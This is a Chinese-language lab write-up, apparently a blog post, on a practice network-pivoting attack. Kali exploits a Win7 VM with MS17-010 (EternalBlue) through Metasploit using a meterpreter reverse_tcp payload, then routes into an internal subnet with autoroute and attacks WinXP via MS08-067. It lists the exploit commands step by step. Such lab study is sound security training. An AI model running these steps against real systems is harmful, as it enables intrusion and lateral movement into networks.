1、实验内容
模拟使用kali作为攻击机通过外网渗透win7,并把win7作为跳板,攻击内网中的winxp
2、实验准备
靶机:win7(双网卡):192.168.44.164(NAT)+10.10.10.129(仅主机模式)
winxpsp3:10.10.10.128(仅主机模式)
攻击机:kali:192.168.44.165(NAT)
实验开始前,需要配置所需的环境:
1.这里kali使用NAT模式,作为外网的攻击机,通过ifconfig获取IP地址。
2. 配置内网:在VM虚拟机中新建一个虚拟网段Vmnet2,并设置为仅主机模式:
win7虚拟机作为kali的攻击跳板,需要设置两个虚拟网卡,其中一个设置为刚刚设置为仅主机模式:
然后将目标机winxp也设置在同一网段:
这里实验所需要的环境就算配置完成了。
3、渗透攻击环节
这个实验的重点是跨网段攻击,所以就前面的渗透攻击win7不做过多的演示:
3.1kali通过永恒之蓝ms17-010攻击win7
● search ms17-010 //通过nmap扫描到445端口,搜索ms17-010这个漏洞相关的脚本
● use 0 //使用攻击脚本 //kali系统里面在/usr/share/metasploit-framework/modules/目录下能看具体载荷的代码,后边根据具体脚本而定
● set rhost ip地址 // 设置目标的IP地址、我们需要攻击的地址
● set lhost ip地址 //kali的IP地址
● set payload windows/x64/meterpreter/reverse_tcp // 设置基于TCP反向连接的攻击载荷
● run //执行攻击
可以看到我们已经攻击成功了。这里可以使用一些命令:
1、screenshot(获取屏幕快照)
2、上传文件到Windows主机:upload /root/csb666.jpg c://csb666.jpg
3、从Windows主机中下载文件到kali中:download d:/meishaonv.jpg /root
3.2 shell模块进行远程登录
首先我们可以查看它的IP:
如果查看的结果是乱码,输入chcp 65001就可以显示正常。我们可以发现,win7这台机器有两个网卡,发现还有一个10.10.10.x的网段,那我们可以查看是否存在其他ip:
arp -a参数的含义就是通过询问当前协议数据,显示当前 ARP 项。如果指定 inet_addr,则只显示指定计算机的 IP 地址和物理地址。如果不止一个网络接口使用 ARP,则显示每个 ARP 表的项。可以在命令窗口输入arp /?查看具体说明。
我们可以看到在内网中还有一个ip,这个就是要攻击的winxp,通过win7给攻击机kali分配一个网段(将内网段添加到路由):
查看路由映射情况:run autoroute -p
这个时候已经实现了给kali分配一个ip,使得kali可以和winxp进行连接。然后就可以对winxp进行渗透攻击。
4、跨网段攻击 kali——>winxp
使用ms08-067对winxp进行攻击,同kali攻击win7一样:
这里需要注意的是payload只能正向连接,因为winxp是ping不同kali,而kali能ping同winxp。整个跨网段攻击就是这样,这里面通过kali对win7和winxp都挺容易,只需要用已发现的漏洞进行渗透测试,主要是将内网段添加至路由表对于小白来说很陌生。这个实验主要分享学习心得,体会攻击的过程所以不会涉及太多NB的操作。